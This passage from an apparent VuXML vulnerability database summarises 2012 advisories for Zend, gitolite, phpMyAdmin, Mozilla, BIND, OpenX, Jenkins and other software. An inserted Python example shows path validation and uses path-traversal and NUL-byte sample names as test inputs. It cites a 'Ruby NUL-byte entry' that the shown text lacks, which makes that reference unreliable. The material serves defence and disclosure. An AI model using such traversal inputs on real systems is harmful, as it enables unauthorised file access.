<p>The Zend Framework team reports:</p>
<blockquote cite="http://framework.zend.com/security/advisory/ZF2012-01">
<p>The XmlRpc package of Zend Framework is vulnerable to XML
eXternal Entity Injection attacks (both server and client).
The SimpleXMLElement class (SimpleXML PHP extension) is used
in an insecure way to parse XML data. External entities can be
specified by adding a specific DOCTYPE element to XML-RPC
requests. By exploiting this vulnerability an application may be
coerced to open arbitrary files and/or TCP connections.</p>
<p>Additionally, the Zend_Dom, Zend_Feed, Zend_Soap, and
Zend_XmlRpc components are vulnerable to XML Entity Expansion
(XEE) vectors, leading to Denial of Service vectors. XEE attacks
occur when the XML DOCTYPE declaration includes XML entity
definitions that contain either recursive or circular references;
this leads to CPU and memory consumption, making Denial of
Service exploits trivial to implement.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3363</cvename>
<url>https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt</url>
<url>http://framework.zend.com/security/advisory/ZF2012-01</url>
<url>http://framework.zend.com/security/advisory/ZF2012-02</url>
<url>http://www.openwall.com/lists/oss-security/2012/06/26/2</url>
<url>https://secunia.com/advisories/49665/</url>
<url>http://www.magentocommerce.com/download/release_notes</url>
</references>
<dates>
<discovery>2012-06-26</discovery>
<entry>2012-10-16</entry>
<modified>2015-10-14</modified>
</dates>
</vuln>
<vuln vid="f94befcd-1289-11e2-a25e-525400272390">
<topic>gitolite -- path traversal vulnerability</topic>
<affects>
<package>
<name>gitolite</name>
<range><ge>3.01</ge><le>3.04</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Sitaram Chamarty reports:</p>
<blockquote cite="https://groups.google.com/forum/#!topic/gitolite/K9SnQNhCQ-0/discussion">
<p>I'm sorry to say there is a potential path traversal vulnerability in
v3. Thanks to Stephane Chazelas for finding it and alerting me.</p>
<p>Can it affect you? This can only affect you if you are using wild
card repos, *and* at least one of your patterns allows the string
"../" to match multiple times.</p>
<p>How badly can it affect you? A malicious user who *also* has the
ability to create arbitrary files in, say, /tmp (e.g., he has his own
userid on the same box), can compromise the entire "git" user.
Otherwise the worst he can do is create arbitrary repos in /tmp.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4506</cvename>
<mlist msgid="CAMK1S_jotna+d_X2C-+es-M28i1aUBcsNeiXxwJ63EshQ8ht6w@mail.gmail.com">https://groups.google.com/forum/#!topic/gitolite/K9SnQNhCQ-0/discussion</mlist>
</references>
<dates>
<discovery>2012-10-09</discovery>
<entry>2012-10-15</entry>
</dates>
</vuln>
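The Ruby NUL-byte entry and the gitolite entry above are two ways for a checked string to become a different path by the time it reaches the filesystem. The following is an added example, neither gitolite nor Ruby code, that validates a user-supplied repository name before joining it onto a base directory: it rejects embedded NUL bytes, rejects any ".." segment even when a loose wildcard pattern would accept it, and confirms the resolved path still lies under the base. The base directory, the pattern and the sample names are assumptions for illustration.

```python
import os
import re

# Added example (neither gitolite nor Ruby code): validate an attacker-supplied name before
# it becomes a filesystem path. It covers both failure modes quoted above: an embedded NUL
# that truncates the path once it reaches the C library, and a loose wildcard pattern that
# lets "../" match repeatedly so the final path escapes the repository base.

REPO_BASE = "/home/git/repositories"     # assumed layout
WILD_PATTERN = re.compile(r"^foo/.*$")   # deliberately loose pattern, as in the gitolite case

def repo_path_unsafe(name):
    """Flawed: any name the pattern accepts is joined straight onto the base directory."""
    if WILD_PATTERN.match(name) is None:
        raise ValueError("name does not match pattern")
    return os.path.normpath(os.path.join(REPO_BASE, name + ".git"))

def repo_path_safe(name):
    """Hardened: reject NUL, absolute names and '..' segments, then confirm the result is under REPO_BASE."""
    if "\x00" in name:
        raise ValueError("NUL byte in name")
    if WILD_PATTERN.match(name) is None:
        raise ValueError("name does not match pattern")
    if name.startswith("/") or ".." in name.split("/"):
        raise ValueError("path traversal in name")
    path = os.path.normpath(os.path.join(REPO_BASE, name + ".git"))
    if os.path.commonpath([REPO_BASE, path]) != REPO_BASE:
        raise ValueError("resolved path escapes REPO_BASE")
    return path

def classify(name):
    """Return (unsafe_result, safe_result) for one name; a rejection reads 'rejected: reason'."""
    results = []
    for build in (repo_path_unsafe, repo_path_safe):
        try:
            results.append(build(name))
        except ValueError as exc:
            results.append("rejected: %s" % exc)
    return tuple(results)

SAMPLE_NAMES = [                    # constructed inputs
    "foo/bar",                      # legitimate
    "foo/../../../tmp/evil",        # "../" matched three times by foo/.*
    "foo/bar\x00/../../tmp/evil",   # NUL: the C library would see only foo/bar
]
```

The NUL check has to come first and has to be explicit: normpath and the regex both treat the NUL as an ordinary character, so every later check would be reasoning about a path the operating system will never see.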
<vuln vid="ef417da3-1640-11e2-999b-e0cb4e266481">
<topic>phpMyAdmin -- Multiple XSS due to unescaped HTML output in Trigger, Procedure and Event pages and Fetching the version information from a non-SSL site is vulnerable to a MITM attack</topic>
<affects>
<package>
<name>phpMyAdmin</name>
<range><ge>3.5</ge><lt>3.5.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The phpMyAdmin development team reports:</p>
<blockquote cite="http://www.phpmyadmin.net/home_page/security/PMASA-2012-6.php">
<p>When creating/modifying a trigger, event or procedure
with a crafted name, it is possible to trigger an XSS.</p>
</blockquote>
<blockquote cite="http://www.phpmyadmin.net/home_page/security/PMASA-2012-7.php">
<p>To display information about the current phpMyAdmin
version on the main page, a piece of JavaScript is fetched
from the phpmyadmin.net website in non-SSL mode. A
man-in-the-middle could modify this script on the wire to
cause mischief.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5339</cvename>
<url>http://www.phpmyadmin.net/home_page/security/PMASA-2012-6.php</url>
<cvename>CVE-2012-5368</cvename>
<url>http://www.phpmyadmin.net/home_page/security/PMASA-2012-7.php</url>
</references>
<dates>
<discovery>2012-10-08</discovery>
<entry>2012-10-14</entry>
</dates>
</vuln>
<vuln vid="6e5a9afd-12d3-11e2-b47d-c8600054b392">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>11.0,1</gt><lt>16.0.1,1</lt></range>
<range><lt>10.0.9,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.9,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.13.1</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.9</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.13.1</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>11.0</gt><lt>16.0.1</lt></range>
<range><lt>10.0.9</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>10.0.9</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-74 Miscellaneous memory safety hazards (rv:16.0/
rv:10.0.8)</p>
<p>MFSA 2012-75 select element persistance allows for attacks</p>
<p>MFSA 2012-76 Continued access to initial origin after setting
document.domain</p>
<p>MFSA 2012-77 Some DOMWindowUtils methods bypass security checks</p>
<p>MFSA 2012-78 Reader Mode pages have chrome privileges</p>
<p>MFSA 2012-79 DOS and crash with full screen and history navigation</p>
<p>MFSA 2012-80 Crash with invalid cast when using instanceof
operator</p>
<p>MFSA 2012-81 GetProperty function can bypass security checks</p>
<p>MFSA 2012-82 top object and location property accessible by
plugins</p>
<p>MFSA 2012-83 Chrome Object Wrapper (COW) does not disallow access
to privileged functions or properties</p>
<p>MFSA 2012-84 Spoofing and script injection through location.hash</p>
<p>MFSA 2012-85 Use-after-free, buffer overflow, and out of bounds
read issues found using Address Sanitizer</p>
<p>MFSA 2012-86 Heap memory corruption issues found using Address
Sanitizer</p>
<p>MFSA 2012-87 Use-after-free in the IME State Manager</p>
<p>MFSA 2012-88 Miscellaneous memory safety hazards (rv:16.0.1)</p>
<p>MFSA 2012-89 defaultValue security checks not applied</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3982</cvename>
<cvename>CVE-2012-3983</cvename>
<cvename>CVE-2012-3984</cvename>
<cvename>CVE-2012-3985</cvename>
<cvename>CVE-2012-3986</cvename>
<cvename>CVE-2012-3987</cvename>
<cvename>CVE-2012-3988</cvename>
<cvename>CVE-2012-3989</cvename>
<cvename>CVE-2012-3990</cvename>
<cvename>CVE-2012-3991</cvename>
<cvename>CVE-2012-3992</cvename>
<cvename>CVE-2012-3993</cvename>
<cvename>CVE-2012-3994</cvename>
<cvename>CVE-2012-3995</cvename>
<cvename>CVE-2012-4179</cvename>
<cvename>CVE-2012-4180</cvename>
<cvename>CVE-2012-4181</cvename>
<cvename>CVE-2012-4182</cvename>
<cvename>CVE-2012-4183</cvename>
<cvename>CVE-2012-4184</cvename>
<cvename>CVE-2012-4186</cvename>
<cvename>CVE-2012-4187</cvename>
<cvename>CVE-2012-4188</cvename>
<cvename>CVE-2012-4190</cvename>
<cvename>CVE-2012-4191</cvename>
<cvename>CVE-2012-4192</cvename>
<cvename>CVE-2012-4193</cvename>
<url>http://www.mozilla.org/security/known-vulnerabilities/</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-74.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-75.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-76.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-77.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-78.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-79.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-80.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-81.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-82.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-83.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-84.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-85.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-86.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-87.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-88.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-89.html</url>
</references>
<dates>
<discovery>2012-10-09</discovery>
<entry>2012-10-10</entry>
<modified>2012-10-11</modified>
</dates>
</vuln>
<vuln vid="57a700f9-12c0-11e2-9f86-001d923933b6">
<topic>dns/bind9* -- crash on deliberately constructed combination of records</topic>
<affects>
<package>
<name>bind99</name>
<range><lt>9.9.1.4</lt></range>
</package>
<package>
<name>bind99-base</name>
<range><lt>9.9.1.4</lt></range>
</package>
<package>
<name>bind98</name>
<range><lt>9.8.3.4</lt></range>
</package>
<package>
<name>bind98-base</name>
<range><lt>9.8.3.4</lt></range>
</package>
<package>
<name>bind97</name>
<range><lt>9.7.6.4</lt></range>
</package>
<package>
<name>bind97-base</name>
<range><lt>9.7.6.4</lt></range>
</package>
<package>
<name>bind96</name>
<range><lt>9.6.3.1.ESV.R7.4</lt></range>
</package>
<package>
<name>bind96-base</name>
<range><lt>9.6.3.1.ESV.R7.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISC reports:</p>
<blockquote cite="https://kb.isc.org/article/AA-00801/">
<p>A deliberately constructed combination of records could cause named
to hang while populating the additional section of a response.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5166</cvename>
</references>
<dates>
<discovery>2012-09-26</discovery>
<entry>2012-10-10</entry>
</dates>
</vuln>
<vuln vid="dee44ba9-08ab-11e2-a044-d0df9acfd7e5">
<topic>OpenX -- SQL injection vulnerability</topic>
<affects>
<package>
<name>openx</name>
<range><lt>2.8.10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Secunia reports:</p>
<blockquote cite="http://secunia.com/advisories/50598/">
<p>A vulnerability has been discovered in OpenX, which can be
exploited by malicious people to conduct SQL injection
attacks.</p>
<p>Input passed via the "xajaxargs" parameter to
www/admin/updates-history.php (when "xajax" is set to
"expandOSURow") is not properly sanitised in e.g. the
"queryAuditBackupTablesByUpgradeId()" function
(lib/OA/Upgrade/DB_UpgradeAuditor.php) before being used in SQL
queries. This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code.</p>
<p>The vulnerability is confirmed in version 2.8.9. Prior versions
may also be affected.</p>
</blockquote>
</body>
</description>
<references>
<url>http://secunia.com/advisories/50598/</url>
</references>
<dates>
<discovery>2012-09-14</discovery>
<entry>2012-09-27</entry>
</dates>
</vuln>
<vuln vid="73efb1b7-07ec-11e2-a391-000c29033c32">
<topic>eperl -- Remote code execution</topic>
<affects>
<package>
<name>eperl</name>
<range><le>2.2.14_4</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>David Madison reports:</p>
<blockquote cite="http://www.shmoo.com/mail/bugtraq/jun01/msg00286.shtml">
<p>ePerl is a multipurpose Perl filter and interpreter program
for Unix systems. The ePerl preprocessor contains an input
validation error. The preprocessor allows foreign data to be
"safely" included using the 'sinclude' directive.</p>
<p>The problem occurs when a file referenced by a 'sinclude'
directive contains a 'include' directive; the contents of
the file referred to by the second directive will be loaded
and executed.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2001-0733</cvename>
<url>http://www.shmoo.com/mail/bugtraq/jun01/msg00286.shtml</url>
<bid>2912</bid>
<url>http://xforce.iss.net/xforce/xfdb/6743</url>
<url>http://osvdb.org/show/osvdb/1880</url>
</references>
<dates>
<discovery>2001-06-21</discovery>
<entry>2012-09-26</entry>
</dates>
</vuln>
<vuln vid="98690c45-0361-11e2-a391-000c29033c32">
<topic>ImageMagick and GraphicsMagick -- DoS via specially crafted PNG file</topic>
<affects>
<package>
<name>ImageMagick</name>
<range><le>6.7.8.6</le></range>
</package>
<package>
<name>ImageMagick-nox11</name>
<range><le>6.7.8.6</le></range>
</package>
<package>
<name>GraphicsMagick</name>
<range><ge>1.3.0</ge><le>1.3.16</le></range>
</package>
<package>
<name>GraphicsMagick-nox11</name>
<range><ge>1.3.0</ge><le>1.3.16</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Kurt Seifried reports:</p>
<blockquote cite="https://bugzilla.redhat.com/show_bug.cgi?id=844105">
<p>There is an issue in ImageMagick that is also present in
GraphicsMagick. CVE-2011-3026 deals with libpng memory
allocation, and limitations have been added so that a bad PNG
can't cause the system to allocate a lot of memory and a
denial of service. However on further investigation of
ImageMagick, Tom Lane found that PNG malloc function
(Magick_png_malloc) in turn calls AcquireMagickMemory with an
improper size argument.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3438</cvename>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=844105</url>
<bid>54716</bid>
<url>http://secunia.com/advisories/50090</url>
<url>http://xforce.iss.net/xforce/xfdb/77259</url>
<url>http://osvdb.org/show/osvdb/84323</url>
</references>
<dates>
<discovery>2012-07-28</discovery>
<entry>2012-09-20</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="ec255bd8-02c6-11e2-92d1-000d601460a4">
<topic>php5-sqlite -- open_basedir bypass</topic>
<affects>
<package>
<name>php5-sqlite</name>
<range><ge>5.2</ge><lt>5.2.17_11</lt></range>
<range><ge>5.3</ge><lt>5.3.15</lt></range>
</package>
<package>
<name>php52-sqlite</name>
<range><lt>5.2.17_11</lt></range>
</package>
<package>
<name>php53-sqlite</name>
<range><lt>5.3.15</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>MITRE CVE team reports:</p>
<blockquote cite="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3365">
<p>The SQLite functionality in PHP before 5.3.15 allows remote
attackers to bypass the open_basedir protection mechanism via
unspecified vectors.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3365</cvename>
<url>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3365</url>
</references>
<dates>
<discovery>2012-06-14</discovery>
<entry>2012-09-19</entry>
</dates>
</vuln>
<vuln vid="9b2a5e88-02b8-11e2-92d1-000d601460a4">
<topic>php5 -- Denial of Service in php_date_parse_tzfile()</topic>
<affects>
<package>
<name>php5</name>
<range><ge>5.2</ge><lt>5.2.17_11</lt></range>
<range><ge>5.3</ge><lt>5.3.9</lt></range>
</package>
<package>
<name>php52</name>
<range><lt>5.2.17_11</lt></range>
</package>
<package>
<name>php53</name>
<range><lt>5.3.9</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>MITRE CVE team reports:</p>
<blockquote cite="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0789">
<p>Memory leak in the timezone functionality in PHP before 5.3.9
allows remote attackers to cause a denial of service (memory
consumption) by triggering many strtotime function calls, which are
not properly handled by the php_date_parse_tzfile cache.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0789</cvename>
<url>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0789</url>
<url>https://bugs.php.net/bug.php?id=53502</url>
</references>
<dates>
<discovery>2010-12-08</discovery>
<entry>2012-09-19</entry>
</dates>
</vuln>
<vuln vid="53a0ddef-0208-11e2-8afa-0024e830109b">
<topic>dns/bind9* -- Several vulnerabilities</topic>
<affects>
<package>
<name>bind99</name>
<range><lt>9.9.1.3</lt></range>
</package>
<package>
<name>bind98</name>
<range><lt>9.8.3.3</lt></range>
</package>
<package>
<name>bind97</name>
<range><lt>9.7.6.3</lt></range>
</package>
<package>
<name>bind96</name>
<range><lt>9.6.3.1.ESV.R7.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISC reports:</p>
<blockquote cite="https://kb.isc.org/article/AA-00788">
<p>Prevents a crash when queried for a record whose RDATA exceeds
65535 bytes.</p>
<p>Prevents a crash when validating caused by using "Bad cache" data
before it has been initialized.</p>
<p>ISC_QUEUE handling for recursive clients was updated to address
a race condition that could cause a memory leak. This rarely
occurred with UDP clients, but could be a significant problem
for a server handling a steady rate of TCP queries.</p>
<p>A condition has been corrected where improper handling of
zero-length RDATA could cause undesirable behavior, including
termination of the named process.</p>
</blockquote>
</body>
</description>
<references>
<url>https://kb.isc.org/article/AA-00788</url>
</references>
<dates>
<discovery>2012-09-12</discovery>
<entry>2012-09-18</entry>
</dates>
</vuln>
<vuln vid="d846af5b-00f4-11e2-b6d0-00e0814cab4e">
<topic>jenkins -- multiple vulnerabilities</topic>
<affects>
<package>
<name>jenkins</name>
<range><lt>1.482</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Jenkins Security Advisory reports:</p>
<blockquote cite="https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-09-17">
<p>This advisory announces security vulnerabilities that were found
in Jenkins core and several plugins.</p>
<ol>
<li>The first vulnerability in Jenkins core allows unprivileged
users to insert data into Jenkins master, which can lead to
remote code execution. For this vulnerability to be exploited,
the attacker must have HTTP access to a Jenkins master, and
he must have read access to Jenkins.</li>
<li>The second vulnerability in Jenkins core is a cross-site
scripting vulnerability. This allows an attacker to craft a URL
that points to Jenkins, and if a legitimate user clicks this link,
the attacker will be able to hijack the user session.</li>
<li>The third vulnerability is a cross-site scripting vulnerability
in the Violations plugin.</li>
<li>The fourth vulnerability is a cross-site scripting vulnerability
in The Continuous Integration Game plugin.</li>
</ol>
</blockquote>
</body>
</description>
<references>
<url>https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-09-17</url>
</references>
<dates>
<discovery>2012-09-17</discovery>
<entry>2012-09-17</entry>
</dates>
</vuln>
<vuln vid="62f36dfd-ff56-11e1-8821-001b2134ef46">
<topic>vlc -- arbitrary code execution in Real RTSP and MMS support</topic>
<affects>
<package>
<name>vlc</name>
<range><lt>2.0.1,3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Jean-Baptiste Kempf, on behalf of the VideoLAN project reports:</p>
<blockquote cite="http://www.videolan.org/security/sa1201.html">
<p>If successful, a malicious third party could crash the VLC
media player process. Arbitrary code execution could be possible
on some systems.</p>
</blockquote>
</body>
</description>
<references>
<url>http://www.videolan.org/security/sa1201.html</url>
<url>http://www.videolan.org/security/sa1202.html</url>
<cvename>CVE-2012-1775</cvename>
<cvename>CVE-2012-1776</cvename>
</references>
<dates>
<discovery>2012-03-12</discovery>
<entry>2012-09-15</entry>
</dates>
</vuln>
<vuln vid="143f6932-fedb-11e1-ad4a-003067b2972c">
<topic>bacula -- Console ACL Bypass</topic>
<affects>
<package>
<name>bacula</name>
<range><lt>5.2.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="https://secunia.com/advisories/50535/">
<p>A security issue has been reported in Bacula, which can be
exploited by malicious users to bypass certain security
restrictions.</p>
<p>The security issue is caused due to an error within the implementation
of console ACLs, which can be exploited to gain access to certain
restricted functionality and e.g. dump resources.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4430</cvename>
<url>http://www.bacula.org/git/cgit.cgi/bacula/commit/?id=67debcecd3d530c429e817e1d778e79dcd1db905</url>
<url>https://secunia.com/advisories/50535/</url>
<url>http://sourceforge.net/projects/bacula/files/bacula/5.2.11/ReleaseNotes/view</url>
</references>
<dates>
<discovery>2012-09-12</discovery>
<entry>2012-09-15</entry>
</dates>
</vuln>
<vuln vid="178ba4ea-fd40-11e1-b2ae-001fd0af1a4c">
<topic>mod_pagespeed -- multiple vulnerabilities</topic>
<affects>
<package>
<name>mod_pagespeed</name>
<range><lt>0.10.22.6</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Google Reports:</p>
<blockquote cite="https://developers.google.com/speed/docs/mod_pagespeed/announce-0.10.22.6">
<p>mod_pagespeed 0.10.22.6 is a security update that fixes two
critical issues that affect earlier versions:</p>
<ul>
<li>CVE-2012-4001, a problem with validation of own host name.</li>
<li>CVE-2012-4360, a cross-site scripting attack, which affects versions starting from 0.10.19.1.</li>
</ul>
<p>The effect of the first problem is that it is possible to confuse
mod_pagespeed about its own host name, and to trick it into
fetching resources from other machines. This could be an issue if
the HTTP server has access to machines that are not otherwise
publicly visible.</p>
<p>The second problem would permit a hostile third party to execute
JavaScript in users' browsers in context of the domain running
mod_pagespeed, which could permit interception of users' cookies or
data on the site.</p>
<p>Because of the severity of the two problems, users are strongly
encouraged to update immediately.</p>
<p>Behavior Changes in the Update:</p>
<p>As part of the fix to the first issue, mod_pagespeed will not fetch
resources from machines other than localhost if they are not
explicitly mentioned in the configuration. This means that if you
need resources on the server's domain to be handled by some other
system, you'll need to explicitly use ModPagespeedMapOriginDomain
or ModPagespeedDomain to authorize that.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4001</cvename>
<cvename>CVE-2012-4360</cvename>
<url>https://developers.google.com/speed/docs/mod_pagespeed/announce-0.10.22.6</url>
</references>
<dates>
<discovery>2012-09-12</discovery>
<entry>2012-09-12</entry>
</dates>
</vuln>
<vuln vid="3bbbe3aa-fbeb-11e1-8bd8-0022156e8794">
<topic>freeradius -- arbitrary code execution for TLS-based authentication</topic>
<affects>
<package>
<name>freeradius</name>
<range><ge>2.1.10</ge><lt>2.1.12_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>freeRADIUS security team reports:</p>
<blockquote cite="http://freeradius.org/security.html">
<p>Overflow in EAP-TLS for 2.1.10, 2.1.11 and 2.1.12.</p>
<p>The issue was found by Timo Warns, and communicated to
security@freeradius.org. A sample exploit for the issue was
included in the notification.</p>
<p>The vulnerability was created in commit a368a6f4f4aaf on
August 18, 2010. Vulnerable versions include 2.1.10, 2.1.11,
and 2.1.12. Also anyone running the git "master" branch
after August 18, 2010 is vulnerable.</p>
<p>All sites using TLS-based EAP methods and the above
versions are vulnerable. The only configuration change which
can avoid the issue is to disable EAP-TLS, EAP-TTLS, and
PEAP.</p>
<p>An external attacker can use this vulnerability to
over-write the stack frame of the RADIUS server, and cause
it to crash. In addition, more sophisticated attacks may
gain additional privileges on the system running the RADIUS
server.</p>
<p>This attack does not require local network access to the
RADIUS server. It can be done by an attacker through a WiFi
Access Point, so long as the Access Point is configured to
use 802.1X authentication with the RADIUS server.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3547</cvename>
<url>http://freeradius.org/security.html</url>
<url>http://www.pre-cert.de/advisories/PRE-SA-2012-06.txt</url>
</references>
<dates>
<discovery>2012-09-10</discovery>
<entry>2012-09-11</entry>
<modified>2012-09-11</modified>
</dates>
</vuln>
<vuln vid="c1e5f35e-f93d-11e1-b07f-00235a5f2c9a">
<topic>emacs -- remote code execution vulnerability</topic>
<affects>
<package>
<name>emacs</name>
<range><gt>24.*</gt><lt>24.2</lt></range>
<range><gt>23.*</gt><le>23.4_2</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Chong Yidong reports:</p>
<blockquote cite="http://www.openwall.com/lists/oss-security/2012/08/13/1">
<p>Paul Ling has found a security flaw in the file-local
variables code in GNU Emacs.</p>
<p>When the Emacs user option `enable-local-variables' is
set to `:safe' (the default value is t), Emacs should
automatically refuse to evaluate `eval' forms in file-local
variable sections. Due to the bug, Emacs instead
automatically evaluates such `eval' forms. Thus, if the user
changes the value of `enable-local-variables' to `:safe',
visiting a malicious file can cause automatic execution of
arbitrary Emacs Lisp code with the permissions of the
user.</p>
<p>The bug is present in Emacs 23.2, 23.3, 23.4, and
24.1.</p>
</blockquote>
</body>
</description>
<references>
<bid>54969</bid>
<cvename>CVE-2012-3479</cvename>
<url>https://lists.gnu.org/archive/html/emacs-devel/2012-08/msg00802.html</url>
<url>http://debbugs.gnu.org/cgi/bugreport.cgi?bug=12155</url>
</references>
<dates>
<discovery>2012-08-13</discovery>
<entry>2012-09-08</entry>
<modified>2013-05-13</modified>
</dates>
</vuln>
<vuln vid="30149157-f926-11e1-95cd-001fd0af1a4c">
<topic>wordpress -- multiple unspecified privilege escalation bugs</topic>
<affects>
<package>
<name>wordpress</name>
<range><lt>3.4.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Wordpress reports:</p>
<blockquote cite="http://wordpress.org/news/2012/09/wordpress-3-4-2/">
<p>Version 3.4.2 also fixes a few security issues and contains some
security hardening. The vulnerabilities included potential
privilege escalation and a bug that affects multisite installs with
untrusted users. These issues were discovered and fixed by the
WordPress security team.</p>
</blockquote>
</body>
</description>
<references>
<url>http://wordpress.org/news/2012/09/wordpress-3-4-2/</url>
</references>
<dates>
<discovery>2012-09-06</discovery>
<entry>2012-09-07</entry>
</dates>
</vuln>
<vuln vid="4a8a98ab-f745-11e1-8bd8-0022156e8794">
<topic>moinmoin -- cross-site scripting via RST parser</topic>
<affects>
<package>
<name>moinmoin</name>
<range><lt>1.9.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>MITRE CVE team reports:</p>
<blockquote cite="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1058">
<p>Cross-site scripting (XSS) vulnerability in the
reStructuredText (rst) parser in parser/text_rst.py in
MoinMoin before 1.9.4, when docutils is installed or when
"format rst" is set, allows remote attackers to inject
arbitrary web script or HTML via a javascript: URL in the
refuri attribute.</p>
</blockquote>
</body>
</description>
<references>
<bid>46476</bid>
<cvename>CVE-2011-1058</cvename>
<url>http://moinmo.in/SecurityFixes</url>
</references>
<dates>
<discovery>2011-02-21</discovery>
<entry>2012-09-05</entry>
</dates>
</vuln>
<vuln vid="4f99e2ef-f725-11e1-8bd8-0022156e8794">
<topic>moinmoin -- wrong processing of group membership</topic>
<affects>
<package>
<name>moinmoin</name>
<range><ge>1.9</ge><lt>1.9.4_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>MoinMoin developers report:</p>
<blockquote cite="http://hg.moinmo.in/moin/1.9/rev/7b9f39289e16">
<p>If you have group NAMES containing "All" or "Known" or
"Trusted", they behaved wrong until now (they erroneously
included All/Known/Trusted users even if you did not list
them as members), but will start working correctly with this
changeset.</p>
<p>E.g. AllFriendsGroup:</p>
<ul>
<li>JoeDoe</li>
</ul>
<p>AllFriendsGroup will now (correctly) include only JoeDoe.
It (erroneously) contained all users (including JoeDoe)
before.</p>
<p>E.g. MyTrustedFriendsGroup:</p>
<ul>
<li>JoeDoe</li>
</ul>
<p>MyTrustedFriendsGroup will now (correctly) include only
JoeDoe. It (erroneously) contained all trusted users and
JoeDoe before.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4404</cvename>
<url>http://hg.moinmo.in/moin/1.9/rev/7b9f39289e16</url>
</references>
<dates>
<discovery>2012-09-03</discovery>
<entry>2012-09-05</entry>
<modified>2012-09-11</modified>
</dates>
</vuln>
<vuln vid="918f38cd-f71e-11e1-8bd8-0022156e8794">
<topic>php5 -- header splitting attack via carriage-return character</topic>
<affects>
<package>
<name>php5</name>
<range><ge>5.2</ge><lt>5.2.17_11</lt></range>
<range><ge>5.3</ge><lt>5.3.11</lt></range>
<range><ge>5.4</ge><lt>5.4.1</lt></range>
</package>
<package>
<name>php52</name>
<range><lt>5.2.17_11</lt></range>
</package>
<package>
<name>php53</name>
<range><lt>5.3.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
